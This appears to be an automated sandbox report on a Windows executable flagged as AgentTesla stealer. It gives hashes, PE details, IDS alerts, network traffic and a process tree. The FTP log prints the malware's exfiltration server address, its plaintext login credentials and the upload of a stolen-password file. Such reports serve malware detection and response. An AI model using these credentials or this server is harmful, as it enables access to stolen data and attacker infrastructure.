Entropy (8bit): | 5.064987733454706 |
Encrypted: | false |
SSDEEP: | 12:z30U30b4BFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3F3g4DO4UE+Tz5JB |
MD5: | 30394F72BB157162F35A2DEB1F48BD1A |
SHA1: | 66AD7D748F42C64E0698606A8F019D165DE657E8 |
SHA-256: | 133FABF0CD558FA3E5144E9EF35654FA0422F8424C6D5D82828B8D10EC9BA295 |
SHA-512: | A93E12D6C9927403FE0E20B8A698B24007EBCCD53A29AD65428366C6CE3CED05E5F3AEFF1D46C7D9F174EAEAE5059F0B5D12353B6022965CDC5D187E45FA72E9 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.979738488629949 |
TrID: |
|
File name: | MACHINE SPECIFICATIONS.exe |
File size: | 523776 |
MD5: | 92945d0a2731ef771ea9d10c792e03e1 |
SHA1: | 1eeef600b7b51ce7aa93e825be55b40f3ef8e319 |
SHA256: | 46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612 |
SHA512: | 33ff6835de8b3a4a0002669deb68acf14a770e7546c2250eb6cdcde2ad4841891f504faa77427e864d1b7758481864189039beb8ec9d926f5804bd7da30a5fb2 |
SSDEEP: | 12288:BxNQOgJk4hl4vPE1suvqvku873X9BsILNILZoRPzre:BxNi6MlzX9BsILNILZoFre |
TLSH: | F7B4235560BB2097E21682344A275FA211E4AE2325E6BD4FE3DCBD0F5F732402E39766 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$..c.........."...0......B........... ....@...... .......................@............`................................ |
Icon Hash: | c49a0894909c6494 |
Entrypoint: | 0x400000 |
Entrypoint Section: | |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x63800824 [Fri Nov 25 00:11:16 2022 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: |
Instruction |
---|
dec ebp |
pop edx |
nop |
add byte ptr [ebx], al |
add byte ptr [eax], al |
add byte ptr [eax+eax], al |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7e000 | 0x40a0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7d864 | 0x1c | .text |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0x7b8d3 | 0x7ba00 | False | 0.9942492416582407 | data | 7.996815914318105 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rsrc | 0x7e000 | 0x40a0 | 0x4200 | False | 0.4485677083333333 | data | 5.797210494950491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_ICON | 0x7e190 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | ||
RT_ICON | 0x7e5f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | ||
RT_ICON | 0x7f6a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | ||
RT_GROUP_ICON | 0x81c48 | 0x30 | data | ||
RT_VERSION | 0x81c78 | 0x23c | data | ||
RT_MANIFEST | 0x81eb4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 29, 2022 11:19:53.759691000 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:53.759767056 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:53.759933949 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:53.807363987 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:53.807424068 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.121747017 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.122018099 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.132211924 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.132246971 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.132662058 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.338932991 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.339055061 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.616307974 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.616383076 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.763174057 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.763329983 CET | 443 | 49701 | 3.220.57.224 | 192.168.2.3 |
Nov 29, 2022 11:19:54.763463974 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:19:54.767330885 CET | 49701 | 443 | 192.168.2.3 | 3.220.57.224 |
Nov 29, 2022 11:20:12.212491989 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.231043100 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.231232882 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.250191927 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.250646114 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.269145012 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.269206047 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.269444942 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.296277046 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.296541929 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.314970016 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.315330029 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.333745003 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.334007978 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.352402925 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.354644060 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.373279095 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.378772974 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.397347927 CET | 52259 | 49703 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.397562027 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.397758961 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.416052103 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.420526028 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.420638084 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.438709974 CET | 52259 | 49703 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.438776970 CET | 52259 | 49703 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.438832998 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 |
Nov 29, 2022 11:20:12.438872099 CET | 49703 | 52259 | 192.168.2.3 | 51.195.62.160 |
Nov 29, 2022 11:20:12.438963890 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 29, 2022 11:19:53.677805901 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8 |
Nov 29, 2022 11:19:53.695560932 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3 |
Nov 29, 2022 11:19:53.711530924 CET | 52387 | 53 | 192.168.2.3 | 8.8.8.8 |
Nov 29, 2022 11:19:53.730598927 CET | 53 | 52387 | 8.8.8.8 | 192.168.2.3 |
Nov 29, 2022 11:20:12.084580898 CET | 56924 | 53 | 192.168.2.3 | 8.8.8.8 |
Nov 29, 2022 11:20:12.209414005 CET | 53 | 56924 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 29, 2022 11:19:53.677805901 CET | 192.168.2.3 | 8.8.8.8 | 0xfd66 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 29, 2022 11:19:53.711530924 CET | 192.168.2.3 | 8.8.8.8 | 0x6f4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 29, 2022 11:20:12.084580898 CET | 192.168.2.3 | 8.8.8.8 | 0xa066 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 29, 2022 11:18:50.334419966 CET | 8.8.8.8 | 192.168.2.3 | 0xd9b5 | No error (0) | c-0001.c-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 29, 2022 11:18:50.334419966 CET | 8.8.8.8 | 192.168.2.3 | 0xd9b5 | No error (0) | 13.107.4.50 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | api.ipify.org.herokudns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 3.220.57.224 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 52.20.78.240 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 3.232.242.170 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.695560932 CET | 8.8.8.8 | 192.168.2.3 | 0xfd66 | No error (0) | 54.91.59.199 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | api.ipify.org.herokudns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 54.91.59.199 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 3.220.57.224 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 3.232.242.170 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:19:53.730598927 CET | 8.8.8.8 | 192.168.2.3 | 0x6f4 | No error (0) | 52.20.78.240 | A (IP address) | IN (0x0001) | false | ||
Nov 29, 2022 11:20:12.209414005 CET | 8.8.8.8 | 192.168.2.3 | 0xa066 | No error (0) | 51.195.62.160 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49701 | 3.220.57.224 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-11-29 10:19:54 UTC | 0 | OUT | |
2022-11-29 10:19:54 UTC | 0 | IN | |
2022-11-29 10:19:54 UTC | 0 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Nov 29, 2022 11:20:12.250191927 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Nov 29, 2022 11:20:12.250646114 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | USER user1@electrobist.com |
Nov 29, 2022 11:20:12.269206047 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 331 User user1@electrobist.com OK. Password required |
Nov 29, 2022 11:20:12.269444942 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | PASS w&oNc9e]pf~4 |
Nov 29, 2022 11:20:12.296277046 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 230 OK. Current restricted directory is / |
Nov 29, 2022 11:20:12.314970016 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 504 Unknown command |
Nov 29, 2022 11:20:12.315330029 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | PWD |
Nov 29, 2022 11:20:12.333745003 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 257 "/" is your current location |
Nov 29, 2022 11:20:12.334007978 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | TYPE I |
Nov 29, 2022 11:20:12.352402925 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 200 TYPE is now 8-bit binary |
Nov 29, 2022 11:20:12.354644060 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | PASV |
Nov 29, 2022 11:20:12.373279095 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 227 Entering Passive Mode (51,195,62,160,204,35) |
Nov 29, 2022 11:20:12.397758961 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | STOR PW_user-965543_2022_11_29_11_20_10.html |
Nov 29, 2022 11:20:12.416052103 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 150 Accepted data connection |
Nov 29, 2022 11:20:12.438832998 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 226-File successfully transferred 226-File successfully transferred226 0.023 seconds (measured here), 19.62 Kbytes per second |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 11:18:56 |
Start date: | 29/11/2022 |
Path: | C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x19218000000 |
File size: | 523776 bytes |
MD5 hash: | 92945D0A2731EF771EA9D10C792E03E1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | low |
Target ID: | 10 |
Start time: | 11:19:46 |
Start date: | 29/11/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x10000 |
File size: | 107624 bytes |
MD5 hash: | F866FC1C2E928779C7119353C3091F0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Reputation: | moderate |
Target ID: | 11 |
Start time: | 11:20:05 |
Start date: | 29/11/2022 |
Path: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x800000 |
File size: | 107624 bytes |
MD5 hash: | F866FC1C2E928779C7119353C3091F0C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | .Net C# or VB.NET |
Antivirus matches: |
|
Reputation: | moderate |
Target ID: | 12 |
Start time: | 11:20:05 |
Start date: | 29/11/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff745070000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 13 |
Start time: | 11:20:13 |
Start date: | 29/11/2022 |
Path: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x490000 |
File size: | 107624 bytes |
MD5 hash: | F866FC1C2E928779C7119353C3091F0C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | .Net C# or VB.NET |
Reputation: | moderate |
Target ID: | 14 |
Start time: | 11:20:14 |
Start date: | 29/11/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff745070000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Execution Graph
Execution Coverage: | 16% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 4.2% |
Total number of Nodes: | 407 |
Total number of Limit Nodes: | 50 |
Graph
Function 05EE8B28 Relevance: 5.4, Strings: 4, Instructions: 385COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EE3D4C Relevance: 3.2, Strings: 2, Instructions: 749COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05E95F40 Relevance: 2.8, Instructions: 2761COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EE0040 Relevance: 2.4, Strings: 1, Instructions: 1177COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EE33E4 Relevance: 1.9, Strings: 1, Instructions: 648COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EE372C Relevance: 1.7, Strings: 1, Instructions: 402COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EE3730 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEC1E0 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05E929C8 Relevance: 1.0, Instructions: 1001COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EE5668 Relevance: .8, Instructions: 769COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05DFBE50 Relevance: .8, Instructions: 760COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05E9BC40 Relevance: .5, Instructions: 462COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05E92020 Relevance: .5, Instructions: 458COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05DFF2A0 Relevance: .4, Instructions: 409COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05E90480 Relevance: .4, Instructions: 402COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05DF9708 Relevance: .4, Instructions: 391COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05E92170 Relevance: .4, Instructions: 362COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EED3A0 Relevance: .3, Instructions: 315COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023FFC48 Relevance: .2, Instructions: 238COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEC054 Relevance: .2, Instructions: 233COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023F0878 Relevance: 1.8, APIs: 1, Instructions: 273memoryCOMMON
Control-flow Graph
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05DFE6F9 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEC004 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEDD86 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023FD4AD Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023FA9A0 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEAEDC Relevance: 1.6, APIs: 1, Instructions: 82COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEF1FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023F0AB3 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023F58AF Relevance: 1.6, APIs: 1, Instructions: 62COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023F0554 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEAF10 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EE8AC0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 023F58C0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EECD8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EEBF2C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05EECDAA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05E9151F Relevance: 1.4, Strings: 1, Instructions: 110COMMON
Strings |
|
Memory Dump Source |
|
